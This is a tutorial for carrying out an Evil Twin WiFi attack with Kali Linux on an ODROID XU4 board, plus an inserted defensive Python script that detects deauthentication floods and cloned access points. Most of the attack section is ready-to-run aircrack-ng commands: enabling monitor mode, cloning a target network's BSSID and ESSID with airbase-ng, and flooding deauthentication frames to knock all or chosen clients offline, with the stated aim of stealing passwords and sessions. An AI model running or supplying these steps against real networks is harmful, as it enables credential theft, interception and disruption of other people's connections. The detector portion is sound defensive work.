Evil Twin Attack via Kali on Odroid XU4
The Evil Twin Attack (ET Attack) is a social engineering attack. It is comparable to a phishing attack, with the difference that ET is carried out via WiFi. The goal is to steal sensitive data from the user. This data can be passwords or entire sessions used to access e-mail accounts or social networks.
To get access to the user's data, the ET pretends to be an access point. Its SSID is exactly the same as that of the WiFi known to the user. After the user's connection to the real WiFi access point has been terminated, the ET appears in the same list, with the same SSID. The user thus thinks that the access point is simply displayed twice and connects to the one that offers the better connection. It is therefore important that the attacker places the fake access point in the immediate vicinity of the victim. Once the victim is connected to the ET, the ET can act unnoticed as a Man-in-the-Middle (MitM).
To be able to impersonate the WiFi, the attacker needs the password of the actual router. To obtain this password, social engineering methods are used. The better these measures are carried out, the more likely it is that the potential victim will fall into the trap.
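From the defender's side, the sequence described above leaves observable traces: a burst of deauthentication frames, followed by beacons for a known SSID that do not match the real access point. The following added example (not part of the original tutorial) checks frame records against a known-good baseline; the SSID, BSSIDs, record layout and thresholds are constructed assumptions.

```python
from collections import defaultdict, deque

AP = "AA:BB:CC:00:00:01"  # constructed BSSID of the legitimate access point
# Known-good profile per protected SSID (constructed values).
BASELINE = {"CorpWiFi": {"bssids": {AP}, "channel": 6, "privacy": "WPA2"}}

# Constructed observations: (seconds, type, BSSID, ESSID, channel, privacy, signal dBm)
FRAMES = (
    [(t, "beacon", AP, "CorpWiFi", 6, "WPA2", -62) for t in range(3)]
    + [(3 + i * 0.1, "deauth", AP, None, 6, None, -35) for i in range(30)]
    + [(7, "beacon", AP, "CorpWiFi", 6, "OPN", -30),
       (8, "beacon", "AA:BB:CC:00:00:99", "CorpWiFi", 11, "WPA2", -40),
       (9, "beacon", AP, "CorpWiFi", 6, "WPA2", -30)]
)


def detect(frames, baseline, deauth_threshold=20, window=5.0, rssi_jump=20):
    """Return sorted (alert, BSSID) pairs for deauth floods and suspected twins."""
    alerts = set()
    recent_deauths = defaultdict(deque)  # BSSID -> timestamps inside the window
    last_rssi = {}                       # BSSID -> signal of last clean beacon
    for ts, kind, bssid, essid, channel, privacy, rssi in frames:
        if kind == "deauth":
            times = recent_deauths[bssid]
            times.append(ts)
            while ts - times[0] > window:
                times.popleft()
            if len(times) >= deauth_threshold:
                alerts.add(("deauth-flood", bssid))
            continue
        profile = baseline.get(essid)
        if kind != "beacon" or profile is None:
            continue  # only beacons for protected SSIDs are checked
        if bssid not in profile["bssids"]:
            alerts.add(("unknown-bssid", bssid))       # known SSID, unlisted radio
        elif (channel, privacy) != (profile["channel"], profile["privacy"]):
            alerts.add(("attribute-mismatch", bssid))  # cloned BSSID, different settings
        else:
            # Same BSSID and settings but a sudden signal change: possibly a
            # second transmitter sharing the address (heuristic, can be noisy).
            if abs(rssi - last_rssi.get(bssid, rssi)) >= rssi_jump:
                alerts.add(("signal-jump", bssid))
            last_rssi[bssid] = rssi
    return sorted(alerts)


if __name__ == "__main__":
    for alert, bssid in detect(FRAMES, BASELINE):
        print(f"{alert:20} {bssid}")
```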
Operating system: Kali Linux ODROID-XU3
- Client connected to WiFi
- ODROID XU4 single-board computer (incl. power supply unit 5V/4A)
- eMMC (min. 8GB)
- microSD (min. 8GB)
- microSD to USB adapter
- Monitor (via HDMI)
- WiFi adapter (e.g. Alfa AWUS036EAC)
Installing Kali on ODROID XU4
Step 1: Download
Download the Kali image. The ODROID XU4 is very similar to the ODROID XU3, so the XU3 image can also be used on the XU4.
Step 2: Preparation
- Insert the microSD card into your PC (use the adapter if required)
- Format the microSD card with e.g. "SD Formatter". If you use "SD Formatter", don't forget to check "Format Size Adjustment" in "Options".
- Write the OS image to the microSD card. Required: a program to create bootable devices, e.g. Win32 Disk Imager for Windows.
Step 3: Installing
For the following steps you might need the manual of the ODROID XU4 to see where the mentioned parts are located.
- Attach the eMMC to the ODROID XU4
- Switch the Boot Mode Selector to "microSD"
- Put in the microSD card
- Attach mouse, keyboard and monitor to the XU4. Make sure that all of them are attached before booting - otherwise you will receive a kernel error.
- After that: attach the power supply.
If all steps were performed correctly:
- The fan of the ODROID XU4 starts
- The blue LED should be on (solid light): bootloader running.
- Monitor should display booting.
This can take a while.
Username: kali
Password: kali
States of the ODROID XU4 LED:
- red LED: is on when power is available
- blue LED (solid): when the bootloader is running
- blue LED (blinks slowly, like a heartbeat): kernel is running
- blue LED (blinks fast): kernel is in panic mode
Performing Evil Twin on ODROID XU4
First, connect the WiFi adapter to the XU4, reboot and check whether it is recognized:
sudo reboot
sudo ifconfig
See the available interfaces
Check status of wireless interfaces
Start monitor mode on the available wireless interface.
sudo airmon-ng start <interface> <channel>
Check: the output has to contain "monitor mode enabled".
If necessary, kill the interfering processes and execute the command again:
sudo airmon-ng check kill
sudo airmon-ng start <interface> <channel>
sudo airodump-ng <interface> -c <channel>
After 30-40 seconds, press Ctrl+C, leave the terminal as it is and open a new one.
Creating the twin
sudo airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>
The values are taken from the previous output; they are required to trick the victim. After the command has run, airbase-ng has turned the wireless adapter into an access point. Open a new terminal.
In the next step the client and the XU4 will lose the connection to the internet. Because the WiFi adapter of the XU4 is busy acting as an access point, the XU4 needs either a second WiFi adapter or an Ethernet connection to the internet.
Telling the Client to get lost
Disconnect all Clients:
sudo aireplay-ng --deauth 0 -a <BSSID> <interface> --ignore-negative-one
The "0" indicates how fast the deauthentication packets will be sent (in seconds); 0 is the fastest option. However, this command sometimes doesn't work: it can produce a broadcast storm, so some WiFi routers filter these packets.
Disconnect a specific client:
First run the airodump-ng command again, but with the BSSID of the router, to obtain the MAC address of the client:
sudo airodump-ng wlan0 --bssid <routers BSSID> -c <routers channel>
Then execute the deauth-command:
sudo aireplay-ng --deauth 0 -c <devices MAC address> -a <routers MAC address> <interface>
If neither disconnecting all clients nor disconnecting a specific client worked, you can check if the card supports injection:
sudo aireplay-ng --test wlan0